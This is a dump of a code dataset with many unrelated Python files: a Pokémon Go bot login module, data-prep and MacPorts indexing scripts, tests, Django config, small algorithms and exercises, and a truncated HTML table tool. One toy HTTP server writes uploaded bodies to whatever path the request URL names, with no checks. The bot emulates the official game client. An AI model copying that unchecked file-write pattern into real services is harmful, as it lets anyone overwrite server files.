id stringlengths 1 7 | text stringlengths 6 1.03M | dataset_id stringclasses 1
value |
|---|---|---|
1788982 | <filename>pogo/pogoBot/pogoAPI/api.py
from .custom_exceptions import GeneralPogoException
from .location import Location
from .pgoapi import pgoapi
from .session import PogoSession
from .util import get_encryption_lib_path
# Callbacks and Constants
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = 'https://sso.pokemon.com/sso/login?service=https%3A%2F%2Fsso.pokemon.com%2Fsso%2Foauth2.0%2FcallbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
PTC_CLIENT_SECRET = '<KEY>'
ANDROID_ID = '9774d56d682e549c'
SERVICE = 'audience:server:client_id:848232511240-7so421jotr2609rmqakceuu1luuq0ptb.apps.googleusercontent.com'
APP = 'com.nianticlabs.pokemongo'
CLIENT_SIG = '321187995bc7cdc2b5fc91b11a96e2baa8602c62'
class PokeAuthSession():
def __init__(self, username, password, provider, logger, config, geo_key=None):
if geo_key and not geo_key.startswith('AIza'):
raise GeneralPogoException("Google Maps key is invalid. Must start with 'AIza'")
self.geo_key = geo_key
self.logger = logger
self.config = config
self.provider = provider
self.api = pgoapi.PGoApi(config)
self.api.activate_signature(get_encryption_lib_path())
self.api.set_logger(logger)
self.session = self.api.get_session()
# User credentials
self.username = username
self.password = password
def setLocation(self, locationLookup, pogo_session=None):
# determine location
location = None
if pogo_session:
location = pogo_session.location
elif locationLookup:
location = Location(locationLookup, self.geo_key, self.api)
self.logger.info(location)
if location:
self.api.set_position(*location.getCoordinates())
return location
else:
raise GeneralPogoException('Location not found')
def createPogoSession(self, location, provider=None, pogo_session=None):
getter = None if not pogo_session else pogo_session.getter
return PogoSession(
self.session,
self.provider,
location,
self.logger,
self.api,
self.config,
getter=getter
)
def createGoogleSession(self, locationLookup='', pogo_session=None):
self.logger.info('Creating Google session for %s', self.username)
location = self.setLocation(locationLookup, pogo_session)
log = self.api.login('google', self.username, self.password, app_simulation=False)
if not log:
raise GeneralPogoException("Google login failed. Double check your login info.")
return self.createPogoSession(
location,
provider='google',
pogo_session=pogo_session
)
def createPTCSession(self, locationLookup='', pogo_session=None):
instance = self.session
self.logger.info('Creating PTC session for %s', self.username)
location = self.setLocation(locationLookup, pogo_session)
log = self.api.login('ptc', self.username, self.password, app_simulation=False)
if not log:
raise GeneralPogoException("Google login failed. Double check your login info.")
return self.createPogoSession(
location,
pogo_session=pogo_session
)
def authenticate(self, locationLookup):
"""We already have all information, authenticate"""
return {
"google": self.createGoogleSession,
"ptc": self.createPTCSession
}[self.provider](locationLookup=locationLookup)
def reauthenticate(self, pogo_session):
if self.session:
self.session = self.api.make_new_session()
return {
"google": self.createGoogleSession,
"ptc": self.createPTCSession
}[self.provider](pogo_session=pogo_session)
| StarcoderdataPython |
104226 | # Create dummy variables for categorical features with less than 5 unique values
import pandas as pd
from sklearn.preprocessing import LabelEncoder
import gc
import datetime
import calendar
import xgboost as xgb
# import logger.py
from logger import logger
# set iteration
iteration = '3'
logger.info('Start data_prep_full' + iteration + '.py')
# read in data
train = pd.read_table('train.csv', sep=',')
test = pd.read_table('test.csv', sep=',')
# train = pd.read_table('train_sample.csv', sep=',')
train_idx = range(0, train.shape[0])
logger.info('Train data read, dimensions: %d x %d' % (train.shape[0], train.shape[1]))
# test = pd.read_table('test_sample.csv', sep=',')
test_idx = range(train.shape[0], train.shape[0] + test.shape[0])
logger.info('Test data read, dimensions: %d x %d' % (test.shape[0], test.shape[1]))
# create target series
target = train['target']
# append train and test for data prep
df = train.append(test)
logger.info('Train and Test appended, dimensions: %d x %d' % (df.shape[0], df.shape[1]))
# combine train and test for label encoding and preprocessing
gc.collect()
# remove duplicates
# load colummns to remove from csv file
cols_to_rm = list(pd.read_csv('cols_to_rm.csv'))
# add ID col to columns to remove
cols_to_rm += ['ID']
# add the following cols that are duplicative
cols_to_rm += ['VAR_0044']
cols_to_rm += ['target']
# remove duplicate columns and ID
df.drop(labels=cols_to_rm, axis=1, inplace=True) # disable for now
logger.info('Redundant columns removed, dimensions: %d x %d' % (df.shape[0], df.shape[1]))
# remove garbage
gc.collect()
# Clean up dates
# Initialize list of datetime columns
date_cols = ['VAR_0073', 'VAR_0075',
'VAR_0156', 'VAR_0157', 'VAR_0158', 'VAR_0159',
'VAR_0166', 'VAR_0167', 'VAR_0168', 'VAR_0169',
'VAR_0176', 'VAR_0177', 'VAR_0178', 'VAR_0179', 'VAR_0204']
# function to get week of month
def week_of_month(date):
if not pd.isnull(date):
days_this_month = calendar.mdays[int(date.month)]
for i in range(1, days_this_month):
d = datetime.datetime(date.year, date.month, i)
if d.day - d.weekday() > 0:
startdate = d
break
# now we can use the modulo 7 appraoch
return (date - startdate).days // 7 + 1
def format_dates(df):
for col in date_cols:
year_col = col + '_yr'
month_col = col + '_mth'
quart_col = col + '_q'
day_col = col + '_day'
doy_col = col + '_doy'
woy_col = col + '_woy'
dow_col = col + '_dow'
wom_col = col + '_wom'
df[col] = pd.to_datetime(df[col], format='%d%b%y:%H:%M:%S')
df[year_col] = df[col].dt.year
df[month_col] = df[col].dt.month
df[day_col] = df[col].dt.day
df[quart_col] = df[col].dt.quarter
df[doy_col] = df[col].dt.dayofyear
df[woy_col] = df[col].dt.weekofyear
df[dow_col] = df[col].dt.dayofweek+1 # +1 so monday = 1
df[wom_col] = df[col].apply(week_of_month)+1 # +1 so wom starts from 1
# run format dates
format_dates(df)
# get hour of day for VAR_0204
df['VAR_0204_hr'] = df['VAR_0204'].dt.hour+1 # +1 first hour = 1
logger.info('Dates formatted')
# save date_cols created for future identification
date_cols_full = []
for date in date_cols:
date_cols_full += [date+'_yr'] + [date+'_mth'] + [date+'_q'] + [date+'_day'] + [date+'_doy'] \
+ [date+'_woy'] + [date+'_dow'] + [date+'_wom']
date_cols_full += ['VAR_0204_hr']
date_cols_full = pd.DataFrame(date_cols_full, columns=['date_cols'])
date_cols_full.to_csv('date_cols_full.csv', index=False)
logger.info('date_cols_full.csv saved')
# initialize label encoder
le = LabelEncoder()
# define function to encode categorical columns via apply
def col_cleanup(col):
if col.dtype.name == 'object':
le.fit(col)
return le.transform(col).astype(int)
else:
return col.fillna(-1)
# apply col_cleanup to all columns
df = df.apply(col_cleanup)
logger.info('Columns encoded')
gc.collect()
# convert datetime cols to integer difference from first date in that col
# this comes after col_cleanup as we need to convert NaT date values to -1 first
def date_to_int(df):
for col in date_cols:
df[col] = (df[col] - df[col].min()).astype('timedelta64[D]').astype(int)
# convert dates to integers
date_to_int(df)
gc.collect()
# CREATE DUMMY VARIABLES FOR CATEGORICAL COLUMNS
cat_columns = []
for col, values in df.iteritems():
if len(values.unique()) <= 5:
cat_columns.append(col)
cat_columns_11 = ['VAR_0283', 'VAR_0305', 'VAR_0325', 'VAR_0342']
# 404 and 493 contain occupations, don't use for now as too many unique values
# 200, 237, and 274 contain location variables, don't use for now as too many unique values
# cat_columns_11 = ['VAR_0200', 'VAR_0237', 'VAR_0274', 'VAR_0283', 'VAR_0305', 'VAR_0325',
# 'VAR_0342', 'VAR_0404', 'VAR_0493']
cat_columns += cat_columns_11
cat_columns.remove('VAR_0204') # remove this date column
# create df of cat_columns
df_cat = df[cat_columns]
logger.info('Dataframe of categorical features created, dimensions: %d x %d' % (df_cat.shape[0], df_cat.shape[1]))
# convert column types to object
df_cat = df_cat.astype('object')
# create dummy columns
df_cat = pd.get_dummies(df_cat)
logger.info('Dataframe of dummy variables created, dimensions: %d x %d' % (df_cat.shape[0], df_cat.shape[1]))
# get list df of numeric columns only
df = df.drop(cat_columns, axis=1)
logger.info('Dataframe of categorical features created, dimensions: %d x %d' % (df.shape[0], df.shape[1]))
# concatenate df of numeric features and df of dummy features
df = pd.concat([df, df_cat], axis=1)
logger.info('Concatenated df of numerics and df of dummy variables; dimensions: %d x %d' % (df.shape[0], df.shape[1]))
# split back into train and test set
train = df.iloc[train_idx, :]
train = pd.concat([train, target], axis=1)
test = df.iloc[test_idx, :]
# SAVE PROCESSED CSV
# save train_proc_full
logger.info('Saving train_proc_full%s.csv: %d rows x %d col' % (iteration, train.shape[0], train.shape[1]))
train.to_csv('train_proc_full' + iteration + '.csv', index=False) # to save full vars
logger.info('train_proc_full' + iteration + '.csv saved') # to save full vars
# remove target from train
train.drop(['target'], axis=1, inplace=True)
logger.info('target dropped from train: %d rows x %d col' % (train.shape[0], train.shape[1]))
# save test_proc_full
logger.info('Saving test_proc_full%s.csv: %d rows x %d col' % (iteration, test.shape[0], test.shape[1]))
test.to_csv('test_proc_full' + iteration + '.csv', index=False) # to save full vars
logger.info('test_proc_full' + iteration + '.csv saved') # to save full vars
# CREATE XGB MATRIX
logger.info('Start create_xgb_matrix.py')
# train = pd.read_csv('train_proc_full' + iteration + '.csv')
# logger.info('train_proc_full' + iteration + '.csv read')
# logger.info('Dimensions of train with target: %d x %d' % (train.shape[0], train.shape[1]))
#
# # create target series
# target = train['target']
#
# # drop target col from train
# train.drop('target', axis=1, inplace=True)
# logger.info('Dimensions of train: %d x %d' % (train.shape[0], train.shape[1]))
gc.collect()
# create xgb matrix
train_xgb = xgb.DMatrix(data=train, label=target)
logger.info('train xgbDMatrix created')
train_xgb.save_binary('train_proc_full' + iteration + '.buffer')
logger.info('train_proc_full' + iteration + '.buffer saved')
# create xgb matrix
test_xgb = xgb.DMatrix(data=test)
logger.info('train xgbDMatrix created')
test_xgb.save_binary('test_proc_full' + iteration + '.buffer')
logger.info('test_proc_full' + iteration + '.buffer saved')
| StarcoderdataPython |
1665579 | <gh_stars>10-100
import os
import subprocess
import sys
import io
import shutil
import json
import django
from port.models import LastPortIndexUpdate
import config
from settings import BASE_DIR
sys.path.append(BASE_DIR)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
django.setup()
def rebuild_repo(directory, url, name):
# remove the existing repo directory, if available
if os.path.isdir(directory):
shutil.rmtree(url)
# cd into the data directory
os.chdir(config.DATA_DIR)
# clone the repo
subprocess.run([config.GIT, 'clone', '--quiet', url, name])
def refresh_portindex_json():
# check if the contrib repo is available
if not os.path.isdir(config.MACPORTS_CONTRIB_DIR):
rebuild_repo(config.MACPORTS_CONTRIB_DIR, config.MACPORTS_CONTRIB_URL, config.MACPORTS_CONTRIB)
# cd into the contrib repo
os.chdir(config.MACPORTS_CONTRIB_DIR)
# update the contrib repo
subprocess.call([config.GIT, 'pull', '--quiet'])
# go back
os.chdir("..")
# check if the ports repo is available
if not os.path.isdir(config.MACPORTS_PORTS_DIR):
rebuild_repo(config.MACPORTS_PORTS_DIR, config.MACPORTS_PORTS_URL, config.MACPORTS_PORTS)
# cd into ports directory
os.chdir(config.MACPORTS_PORTS_DIR)
# update the ports repo
subprocess.call([config.GIT, 'pull', '--quiet'])
latest_commit = subprocess.run([config.GIT, 'rev-parse', 'HEAD'], stdout=subprocess.PIPE).stdout.decode('utf-8')
# update/generate the portindex
subprocess.run(['portindex', '-p', 'macosx_19_i386', '-x'])
# update/generate portindex.json
portindexjson = subprocess.run([config.TCLSH, config.PORTINDEX2JSON, config.LOCAL_PORTINDEX, '--info', 'commit={}'.format(latest_commit)], stdout=subprocess.PIPE).stdout.decode('utf-8')
portindexjson = json.loads(portindexjson)
with open(config.LOCAL_PORTINDEX_JSON, 'w') as file:
json.dump(portindexjson, file)
# match the latest commit from the repo and the portindex.json match
if latest_commit != portindexjson.get('info', {}).get('commit'):
# if they don't match, we should abort the operation
raise KeyError
return latest_commit
def get_old_commit():
# first search in database
old_commit_obj = LastPortIndexUpdate.objects.all().first()
if old_commit_obj is None:
old_commit = None
else:
old_commit = old_commit_obj.git_commit_hash
return old_commit
def get_updated_portdirs():
# update portindex.json and get new commit
new_commit = refresh_portindex_json()
old_commit = get_old_commit()
# cd into the ports repository
os.chdir(config.MACPORTS_PORTS_DIR)
# generate the range of commits to find updated paths
range_commits = str(old_commit).strip() + "^.." + str(new_commit).strip()
changed_paths = subprocess.run([config.GIT, 'diff', '--name-only', range_commits], stdout=subprocess.PIPE).stdout.decode('utf-8')
s = io.StringIO(changed_paths)
updated_ports_dir = set()
# loop over all the paths and find portdirs to update
for line in s:
sections = line.split('/')
if len(sections) < 2:
# ignore updates in the root directory
continue
portdir = sections[0].lower() + '/' + sections[1].lower()
updated_ports_dir.add(portdir)
os.chdir(BASE_DIR)
return updated_ports_dir
def get_portindex_json():
if os.path.isfile(config.LOCAL_PORTINDEX_JSON):
with open(config.LOCAL_PORTINDEX_JSON, "r", encoding='utf-8') as file:
try:
data = json.load(file)
except json.decoder.JSONDecodeError:
data = None
return data
else:
return None
| StarcoderdataPython |
4803335 | <reponame>sfstpala/v6wos
import unittest.mock
import tornado.testing
import v6wos.tests
import v6wos.model.hosts
class HostsTest(v6wos.tests.TestCase):
@unittest.mock.patch("couch.AsyncCouch.view")
@unittest.mock.patch("v6wos.model.hosts.Hosts.put")
@unittest.mock.patch("v6wos.model.hosts.Hosts.delete")
@tornado.testing.gen_test
def test_get(self, delete, put, view):
delete.return_value = v6wos.tests.future()
put.return_value = v6wos.tests.future({
"aaaa": [
"fc00:e968:6179::de52:7100",
],
"name": "facebook.com",
})
view.return_value = v6wos.tests.future({
"rows": [
{
"value": {
"host": {
"aaaa": [],
"name": "example.invalid",
},
"type": "host",
},
},
{
"value": {
"host": {
"aaaa": [
"fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
],
"name": "google.com",
},
"type": "host",
},
},
],
})
model = v6wos.model.hosts.Hosts(self.application)
model.all_hosts = ["google.com", "facebook.com"]
res = yield model.get()
self.assertEqual(res, [
{
"aaaa": [
"fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
],
"name": "google.com",
},
{
"aaaa": [
"fc00:e968:6179::de52:7100",
],
"name": "facebook.com",
},
])
@unittest.mock.patch("couch.AsyncCouch.view")
@unittest.mock.patch("couch.AsyncCouch.save_doc")
@unittest.mock.patch("v6wos.util.lookup.check_aaaa")
@unittest.mock.patch("v6wos.util.lookup.check_glue")
@tornado.testing.gen_test
def test_put(self, check_glue, check_aaaa, save_doc, view):
check_aaaa.return_value = [
"fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
]
check_glue.return_value = []
save_doc.return_value = v6wos.tests.future()
view.return_value = v6wos.tests.future({
"rows": [
{
"value": {
"_id": "100",
"_rev": "100-1",
"host": {
"aaaa": [],
"glue": [],
"name": "google.com",
},
"type": "host",
},
},
],
})
model = v6wos.model.hosts.Hosts(self.application)
res = yield model.put("google.com")
self.assertEqual(res, {
"aaaa": [
"fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
],
"glue": [],
"name": "google.com",
})
save_doc.assert_called_once_with({
"_id": "100",
"_rev": "100-1",
"host": {
"aaaa": [
"fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
],
"glue": [],
"name": "google.com",
},
"type": "host",
})
@unittest.mock.patch("couch.AsyncCouch.view")
@unittest.mock.patch("couch.AsyncCouch.delete_docs")
@tornado.testing.gen_test
def test_delete(self, delete_docs, view):
delete_docs.return_value = v6wos.tests.future()
view.return_value = v6wos.tests.future({
"rows": [
{
"value": {
"_id": "200",
"_rev": "200-1",
"host": {
"aaaa": [],
"name": "example.invalid",
},
"type": "host",
},
},
],
})
model = v6wos.model.hosts.Hosts(self.application)
yield model.delete("example.invalid")
delete_docs.assert_called_once_with([{
"_id": "200",
"_rev": "200-1",
"host": {
"aaaa": [],
"name": "example.invalid",
},
"type": "host",
}])
| StarcoderdataPython |
113200 | <reponame>BaDTaG/tacticalrmm
from django.urls import path
from . import views
from apiv3 import views as v3_views
urlpatterns = [
path("newagent/", v3_views.NewAgent.as_view()),
path("meshexe/", v3_views.MeshExe.as_view()),
path("saltminion/", v3_views.SaltMinion.as_view()),
path("<str:agentid>/saltminion/", v3_views.SaltMinion.as_view()),
path("sysinfo/", v3_views.SysInfo.as_view()),
path("hello/", v3_views.Hello.as_view()),
path("checkrunner/", views.CheckRunner.as_view()),
path("<str:agentid>/checkrunner/", views.CheckRunner.as_view()),
]
| StarcoderdataPython |
1764745 | # coding=utf-8
from OTLMOW.OTLModel.Datatypes.KeuzelijstField import KeuzelijstField
from OTLMOW.OTLModel.Datatypes.KeuzelijstWaarde import KeuzelijstWaarde
# Generated with OTLEnumerationCreator. To modify: extend, do not edit
class KlSeinbrugType(KeuzelijstField):
"""Types van seinbrug."""
naam = 'KlSeinbrugType'
label = 'Seinbrug type'
objectUri = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#KlSeinbrugType'
definition = 'Types van seinbrug.'
codelist = 'https://wegenenverkeer.data.vlaanderen.be/id/conceptscheme/KlSeinbrugType'
options = {
'enkeleLigger': KeuzelijstWaarde(invulwaarde='enkeleLigger',
label='enkeleLigger',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlSeinbrugType/enkeleLigger'),
'koker': KeuzelijstWaarde(invulwaarde='koker',
label='koker',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlSeinbrugType/koker'),
'nietDoorlopendeBuis': KeuzelijstWaarde(invulwaarde='nietDoorlopendeBuis',
label='nietDoorlopendeBuis',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlSeinbrugType/nietDoorlopendeBuis'),
'vakwerk': KeuzelijstWaarde(invulwaarde='vakwerk',
label='vakwerk',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlSeinbrugType/vakwerk')
}
| StarcoderdataPython |
1775277 | <reponame>Mikma03/InfoShareacademy_Python_Courses<filename>Part_2_intermediate/mod_6/lesson_3/ex_1_simple_except/example_4.py
def run_example():
try:
print("Przed rzuceniem wyjątku")
raise TypeError("Coś poszło nie tak...")
print("To się nie wydarzy")
except Exception as error:
print(f"Jeżeli wyjątek jest klasą potomną to też się złapie: {error}")
print("I program będzie przetwarzany dalej :)")
if __name__ == '__main__':
run_example()
| StarcoderdataPython |
179689 | # Monocyte - Monocyte - Search and Destroy unwanted AWS Resources relentlessly.
# Copyright 2015 Immobilien Scout GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import warnings
import logging
import boto3
class Resource(object):
def __init__(self, resource, resource_type, resource_id, creation_date,
region=None, reason=None):
self.wrapped = resource
self.region = region
self.resource_type = resource_type
self.resource_id = resource_id
self.creation_date = creation_date
self.reason = reason
def __eq__(self, other):
if type(other) is type(self):
return self.__dict__ == other.__dict__
return False
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return ("{class_name}({resource}, {resource_type}, {resource_id}, "
"{creation_date}, region={region}, reason={reason})").format(
class_name=self.__class__.__name__,
resource=self.wrapped,
resource_type=self.resource_type,
resource_id=self.resource_id,
creation_date=self.creation_date,
region=self.region,
reason=self.reason)
def __repr__(self):
return str(self)
HANDLER_PREFIX = "monocyte.handler."
class Handler(object):
def __init__(self, region_filter, dry_run=True, logger=None, ignored_resources=None, whitelist=None):
warnings.filterwarnings('error')
self.region_filter = region_filter
self.region_names = [region_name for region_name in self.fetch_region_names() if self.region_filter(region_name)]
self.dry_run = dry_run
self.ignored_resources = ignored_resources or []
self.whitelist = whitelist or {}
self.logger = logger or logging.getLogger(__name__)
@property
def resource_type(self):
full_type = "%s.%s" % (self.__class__.__module__, self.__class__.__name__)
return full_type.replace(HANDLER_PREFIX, "")
@property
def name(self):
full_name = "%s.%s" % (self.__class__.__module__, self.__class__.__name__)
return full_name.replace(HANDLER_PREFIX, "")
def get_account_id(self):
return boto3.client('sts').get_caller_identity().get('Account')
def get_whitelist(self):
return self.whitelist.get(self.get_account_id(), {})
def fetch_region_names(self):
raise NotImplementedError("Should have implemented this")
def fetch_unwanted_resources(self):
raise NotImplementedError("Should have implemented this")
def to_string(self, resource):
raise NotImplementedError("Should have implemented this")
def delete(self, resource):
raise NotImplementedError("Should have implemented this")
| StarcoderdataPython |
4812967 | def cholesky(A):
#zero
B = [[0 for _ in range(len(A[0]))] for _ in range(len(A))]
C = [[0 for _ in range(len(A[0]))] for _ in range(len(A))]
#steps 1 and 3
for i in range(len(A)):
B[i][0] = A[i][0]
C[0][i] = A[0][i]/B[0][0]
C[i][i] = 1
#steps 2 and 4
for i in range(len(A)):
for j in range(len(A[0])):
if i >= j:
B[i][j] = A[i][j] - sum(B[i][k]*C[k][j] for k in range(0,j))
else:
C[i][j] = (A[i][j] - sum(B[i][k]*C[k][j] for k in range(0,i)))/B[i][i]
return B,C
def solve_cholesky(S,B,C):
X = [0,0,0]
Y = [0,0,0]
for i in range(len(Y)):
Y[i] = (S[i] - sum([B[i][k]*Y[k] for k in range(len(S))]))/B[i][i]
for i in range(len(X)-1,-1,-1):
X[i] = (Y[i] - sum([C[i][k]*X[k] for k in range(len(Y))]))/C[i][i]
return X | StarcoderdataPython |
1630434 | <reponame>kkcookies99/UAST<filename>Dataset/Leetcode/valid/66/208.py<gh_stars>0
class Solution(object):
def XXX(self, digits):
"""
:type digits: List[int]
:rtype: List[int]
"""
digits[-1] += 1
right = len(digits)-1
while digits[right] ==10:
digits[right] = 0
if right!=0:
right-=1
digits[right]+=1
else:
digits.insert(0,1)
return digits
| StarcoderdataPython |
3209602 | print "Mary had a little lamb." #prints this statement
print "Its fleece was white as %s." % 'snow' #prints "snow" in string format
print "And everywhere that Mary went." #prints this statement
print "." * 10 #what'd that do? I already know. It multiplies "." by 10.
end1 = "C" #attributes "C" to variable "end1"
end2 = "h" #attributes "h" to variable "end2"
end3 = "e" #attributes "e" to variable "end3"
end4 = "e" #attributes "e" to variable "end4"
end5 = "s" #attributes "s" to variable "end5"
end6 = "e" #attributes "e" to variable "end6"
end7 = "B" #attributes "B" to variable "end7"
end8 = "u" #attributes "u" to variable "end8"
end9 = "r" #attributes "r" to variable "end9"
end10 = "g" #attributes "g" to variable "end10"
end11 = "e" #attributes "e" to variable "end11"
end12 = "r" #attributes "r" to variable "end12"
#watch that comma at the end. try removing it to see what happens
print end1 + end2 + end3 + end4 + end5 + end6, #prints all of these. The comma at the end breaks it into multiple lines. So, "Cheese Burger" as opposed to "Cheese / Burger."
print end7 + end8 + end9 + end10 + end11 + end12 | StarcoderdataPython |
3365944 | from django.contrib import admin
from oscar.apps.shipping.models import (
OrderAndItemCharges, WeightBand, WeightBased)
class OrderChargesAdmin(admin.ModelAdmin):
list_display = ('name', 'description', 'price_per_order', 'price_per_item',
'free_shipping_threshold')
class WeightBandAdmin(admin.ModelAdmin):
list_display = ('method', 'weight_from', 'weight_to', 'charge')
admin.site.register(OrderAndItemCharges, OrderChargesAdmin)
admin.site.register(WeightBased)
admin.site.register(WeightBand, WeightBandAdmin)
| StarcoderdataPython |
29855 | <gh_stars>1-10
from http.server import HTTPServer, SimpleHTTPRequestHandler
class RepoRequestHandler(SimpleHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
def _encode(self, text):
return text.encode('utf8')
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
file_name = self.path[1:]
with open(file_name, "w+b") as f:
f.write(body)
f.close()
self._set_headers()
self.wfile.write(self._encode(f'{file_name} stored'))
host = 'localhost'
port = 8080
print(f'simple artifact repo running on {host}:{port}')
httpd = HTTPServer((host, port), RepoRequestHandler)
httpd.serve_forever()
| StarcoderdataPython |
4808324 | """Implements the method used for deciding which feature goes to which level
when plotting."""
import itertools
import math
class Graph:
"""Minimal implementation of non-directional graphs.
Parameters
----------
nodes
A list of objects. They must be hashable.
edges
A list of the form [(n1,n2), (n3,n4)...] where (n1, n2) represents
an edge between nodes n1 and n2.
"""
def __init__(self, nodes, edges):
self.nodes = nodes
self.neighbors = {n: [] for n in nodes}
for n1, n2 in edges:
self.neighbors[n1].append(n2)
self.neighbors[n2].append(n1)
def compute_features_levels(features):
"""Compute the vertical levels on which the features should be displayed
in order to avoid collisions.
`features` must be a list of `dna_features_viewer.GraphicFeature`.
The method used is basically a graph coloring:
- The nodes of the graph are features and they will be colored with a level.
- Two nodes are neighbors if and only if their features's locations overlap.
- Levels are attributed to nodes iteratively starting with the nodes
corresponding to the largest features.
- A node receives the lowest level (starting at 0) that is not already
the level of one of its neighbors.
"""
edges = [
(f1, f2)
for f1, f2 in itertools.combinations(features, 2)
if f1.overlaps_with(f2)
]
graph = Graph(features, edges)
levels = {n: n.data.get("fixed_level", None) for n in graph.nodes}
def collision(node, level):
"""Return whether the node placed at base_level collides with its
neighbors in the graph."""
line_factor = 0.5
nlines = node.data.get("nlines", 1)
for neighbor in graph.neighbors[node]:
neighbor_level = levels[neighbor]
if neighbor_level is None:
continue
neighbor_lines = neighbor.data.get("nlines", 1)
min_distance = line_factor * (nlines + neighbor_lines)
if abs(level - neighbor_level) < min_distance:
return True
return False
for node in sorted(graph.nodes, key=lambda f: -f.length):
if levels[node] is None:
level = 0
while collision(node, level):
level += 0.5
levels[node] = level
return levels
| StarcoderdataPython |
1701587 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# Name: csv_print_html_oia.py
# Description:
#
# Author: m.akei
# Copyright: (c) 2021 by m.na.akei
# Time-stamp: <2021-04-25 16:33:53>
# Licence:
# ----------------------------------------------------------------------
import argparse
import textwrap
import sys
from pathlib import Path
import re
import html
import minify_html
import json
import pandas as pd
VERSION = 1.0
OIA_HANDLER_JS = "oia_handler.js"
def init():
arg_parser = argparse.ArgumentParser(description="print html table made of csv with estimation",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent('''
remark:
For '--part_color', is you want to use comma(,) an colon(:) in word, then those must be escaped by "\".
example:
cat test3.csv
IDX,B,C,O,I,A
1,A,Sample1,Observation1:this is a pen,Investigation1:Atre you there?,Action1: nothing to do
2,B,Sample2,Observation2:this is a pen,Investigation2:Atre you there?,Action2: nothing to do
3,C,Sample3,Observation3:this is a pen,Investigation2:Atre you there?,Action3: nothing to do
csv_print_html_oia.py --columns=IDX,B,C --part_color='this:red' test3.csv O I A > test.html
csv_print_html_oia.py --columns=IDX,B,C --part_color='バリ島:red,米国:green,潜水艦:blue,海軍:black' --search_on_html test3.csv O I A > test.html
'''))
arg_parser.add_argument('-v', '--version', action='version', version='%(prog)s {}'.format(VERSION))
arg_parser.add_argument("--title", dest="TITLE", help="Title of table", type=str, metavar='TITLE', default=None)
arg_parser.add_argument("--columns",
dest="COLUMNS",
help="names of addtional columns",
type=str,
metavar='COLUMNS[,COLUMNS...]',
default=None)
arg_parser.add_argument("--part_color",
dest="PCOLORS",
help="part color for string, color code is one in css codes.",
type=str,
metavar='STRING:COLOR[,STRING:COLOR...]',
default=None)
arg_parser.add_argument("--search_on_html", dest="SHTML", help="searching on html is enable", action="store_true", default=False)
arg_parser.add_argument("--output_file", dest="OUTPUT", help="path of output file", type=str, metavar='FILE', default=sys.stdout)
arg_parser.add_argument("--minify", dest="MINIFY", help="minifing html", action="store_true", default=False)
arg_parser.add_argument('csv_file', metavar='CSV_FILE', help='file to read, if empty, stdin is used')
arg_parser.add_argument('oia_columns', metavar='COLUMNS', nargs="+", help="colum names of Observation/Investigation/Action")
args = arg_parser.parse_args()
return args
def html_prologe_oia(align_center=True, width=None, word_colors="", search_on_html=False, progress_bar=False, title=""):
table_css_2 = ""
if align_center:
table_css_2 += "margin-left: auto;margin-right: auto;"
if width is not None:
table_css_2 += "width:{};".format(width)
# text-shadow: 0.1em 0.1em 0.6em gold;
table_css = '''
<style type="text/css">
/* */
body {{
background: -webkit-linear-gradient(left, #25c481, #25b7c4);
background: linear-gradient(to right, #25c481, #25b7c4);
}}
h2.title {{
text-align:center;
margin-bottom: 0pt;
}}
form.word_search {{
position: fixed;
top: 1.5em;
visibility:hidden;
z-index: 100;
}}
span.word_view_span {{
font-weight:bold;
background:#EEEEEE;
box-shadow: 0.0625em 0.0625em 0.0625em 0.0625em rgba(0,0,0,0.4);
border-radius: 0.25em;
padding-left:0.2em;
padding-right:0.2em;
margin-right:0.2em;
}}
fieldset {{
border: 2px solid #ccc;
border-radius: 5px;
padding: 25px;
margin-top: 20px;
background-color: #e0ffff;
box-shadow: 5px 5px 5px rgba(0,0,0,0.2);
}}
legend {{
border: 1px solid #ccc;
border-bottom: 0;
border-radius: 5px 5px 0 0;
padding: 8px 18px 0;
position:relative;
top: -14px;
background-color: #e0ffff;
}}
td.dblclicable:hover {{
font-weight:bold;
font-size:110%;
}}
table {{
{}
box-shadow: 0 0 20px rgba(0, 0, 0, 0.15);
}}
table caption {{
font-size:large; font-weight: bold;
}}
th {{
/* background-color: #6495ed; */
background-color: #009879;
padding:6px;
}}
thead tr th {{
border-bottom: solid 1px;
color: #ffffff;
}}
td {{
padding:6pt;
}}
/* Table CSS: Creating beautiful HTML tables with CSS - DEV Community https://dev.to/dcodeyt/creating-beautiful-html-tables-with-css-428l */
tbody tr {{
border-bottom: 1px solid #dddddd;
background-color: #ffffff;
}}
tbody tr:last-of-type {{
border-bottom: 2px solid #009879;
}}
/* CSSのposition: stickyでテーブルのヘッダー行・列を固定する - Qiita https://qiita.com/orangain/items/6268b6528ab33b27f8f2 */
table.sticky_table thead th {{
position: -webkit-sticky;
position: sticky;
top: 0;
z-index: 1;
}}
table.sticky_table th:first-child {{
position: -webkit-sticky;
position: sticky;
left: 0;
}}
table.sticky_table thead th:first-child {{
z-index: 2;
}}
</style>
